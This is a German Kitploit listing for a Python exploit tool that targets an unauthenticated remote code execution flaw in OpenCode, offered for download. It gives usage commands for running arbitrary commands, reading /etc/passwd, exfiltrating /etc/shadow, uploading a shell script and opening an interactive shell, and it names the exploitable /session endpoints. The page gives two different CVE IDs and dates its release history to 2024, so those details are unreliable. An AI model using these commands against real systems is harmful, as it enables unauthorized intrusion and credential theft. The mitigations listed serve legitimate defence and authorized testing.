Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-22812 — Python-Exploit-Tool für OpenCode RCE (CVE-2026-22812), das Befehlsausführung, Datei lesen/schreiben/hochladen/herunterladen sowie eine interaktive Shell für autorisierte Penetrationstests bereitstellt. | Kitploit
Tools/GitHubGitHub/0xgh057r3c0n/cve-2026-22812
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHub0xgh057r3c0n/cve-2026-22812

CVE-2026-22812

Python-Exploit-Tool für OpenCode RCE (CVE-2026-22812), das Befehlsausführung, Datei lesen/schreiben/hochladen/herunterladen sowie eine interaktive Shell für autorisierte Penetrationstests bereitstellt.

Repository anzeigen
21vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-22812

Überblick

Ein Python-Exploitationstool für die OpenCode Remote Code Execution (RCE)-Schwachstelle, die Versionen < v1.0.216 betrifft. Dieses Tool bietet mehrere Angriffsvektoren, darunter Befehlsausführung, Datei-Lesen/-Schreiben, Datei-Upload/-Download und eine interaktive Shell.

Haftungsausschluss

⚠️ NUR FÜR AUTORISIERTE TESTS ⚠️

  • Dieses Tool ist ausschließlich für legitime Sicherheitstests und autorisierte Penetrationstests gedacht
  • Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung haben
  • Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden
  • Unautorisierter Zugriff auf Computersysteme ist illegal und wird gesetzlich bestraft

Funktionen

  • Schwachstellenerkennung: Prüfen, ob das Ziel verwundbar ist
  • Befehlsausführung: Beliebige Befehle auf dem Ziel ausführen
  • Dateioperationen: Dateien lesen, schreiben, hoch- und herunterladen
  • Interaktive Shell: Vollständige interaktive Shell mit Tab-Vervollständigung
  • Systemaufklärung: Systeminformationen sammeln
  • Proxy-Unterstützung: Verkehr über HTTP-Proxy leiten
  • Statistikverfolgung: Exploitationsaktivitäten überwachen

Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812

# Abhängigkeiten installieren
pip install requests urllib3

# Ausführbar machen (optional)
chmod +x CVE-2026-22812.py

Anforderungen

  • Python 3.6+
  • requests-Bibliothek
  • urllib3-Bibliothek

Verwendung

root@kitploit:~
python3 CVE-2026-22812.py -t http://target:port [Optionen]

Grundlegende Beispiele

root@kitploit:~
# Prüfen, ob das Ziel verwundbar ist
python3 exploit.py -t http://10.0.0.1:4096 --check

# Interaktive Shell
python3 exploit.py -t http://10.0.0.1:4096 -i

# Einzelnen Befehl ausführen
python3 exploit.py -t http://10.0.0.1:4096 -c "id"

# Datei lesen
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd

# Datei hochladen
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh

# Datei herunterladen
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt

# Systeminformationen abrufen
python3 exploit.py -t http://10.0.0.1:4096 --info

# Proxy verwenden (Burp Suite, etc.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080

Befehle der interaktiven Shell

Sobald Sie sich in der interaktiven Shell befinden (-i-Flag), können Sie Folgendes verwenden:

root@kitploit:~
<Befehl>                   Shell-Befehl ausführen
help                       Hilfemenü anzeigen
exit                       Shell verlassen
session                    Sitzungs-ID anzeigen
stats                      Exploitationsstatistiken anzeigen
read <Datei>               Dateiinhalt lesen
download <remote> <lokal>  Datei herunterladen
upload <lokal> <remote>    Datei hochladen
sysinfo                    Systeminformationen abrufen

Schwachstellendetails

  • CVE-ID: CVE-2026-22812 / CVE-2026-22182
  • Produkt: OpenCode
  • Betroffene Versionen: < v1.0.216
  • Schwachstellentyp: Remote Code Execution
  • Angriffsvektor: Netzwerk
  • Authentifizierung: Nicht erforderlich

Technische Details

Die Schwachstelle existiert im Sitzungsverwaltungs-Endpunkt (/session), der es nicht authentifizierten Benutzern ermöglicht, Sitzungen zu erstellen und beliebige Befehle über den Endpunkt /session/{id}/shell auszuführen.

Ausgenutzte Endpunkte:

  1. POST /session - Sitzung erstellen
  2. POST /session/{id}/shell - Befehle ausführen
  3. GET /file/content - Dateien lesen

Gegenmaßnahmen

  1. Upgrade auf OpenCode-Version ≥ v1.0.216
  2. Implementierung ordnungsgemäßer Authentifizierung und Autorisierung
  3. Netzwerkzugriff auf OpenCode-Instanzen einschränken
  4. Eingabevalidierung und -bereinigung implementieren
  5. Web Application Firewall (WAF) verwenden

Codestruktur

root@kitploit:~
CVE-2026-22812.py
├── Colors-Klasse (ANSI-Farbcodes)
├── print_banner() (Banner anzeigen)
├── Exploit-Klasse (Haupt-Exploit-Logik)
│   ├── __init__() (Initialisierung)
│   ├── check_vuln() (Schwachstellenprüfung)
│   ├── create_session() (Sitzung erstellen)
│   ├── exec_cmd() (Befehl ausführen)
│   ├── read_file() (Datei lesen)
│   ├── write_file() (Datei schreiben)
│   ├── upload() (Datei hochladen)
│   ├── download() (Datei herunterladen)
│   ├── get_info() (Systeminformationen)
│   ├── shell() (Interaktive Shell)
│   └── Hilfsmethoden
└── main() (Argumentanalyse)

Lizenz

Dieses Tool wird nur zu Bildungszwecken veröffentlicht. Verwendung auf eigene Gefahr.

Autor

  • GitHub: 0xgh057r3c0n
  • Tool: CVE-2026-22812 Exploitation Tool

Mitwirken

  1. Repository forken
  2. Feature-Branch erstellen
  3. Änderungen committen
  4. In den Branch pushen
  5. Pull Request erstellen

Danksagungen

  • Sicherheitsforscher, die die Schwachstelle entdeckt haben
  • Open-Source-Community
  • Alle Mitwirkenden und Tester

Referenzen

  • OpenCode Security Advisory
  • CVE-Datenbank
  • NVD-Eintrag

Unterstützung

Bei Problemen und Fragen:

  1. Vorhandene GitHub-Issues prüfen
  2. Neues Issue mit detaillierter Beschreibung erstellen
  3. Ziel-URL (falls möglich) und Fehlermeldungen angeben

Versionshistorie

  • v1.0.0 (2024-01-20): Erste Veröffentlichung
    • Schwachstellenerkennung
    • Befehlsausführung
    • Dateioperationen
    • Interaktive Shell
    • Proxy-Unterstützung
Tool herunterladen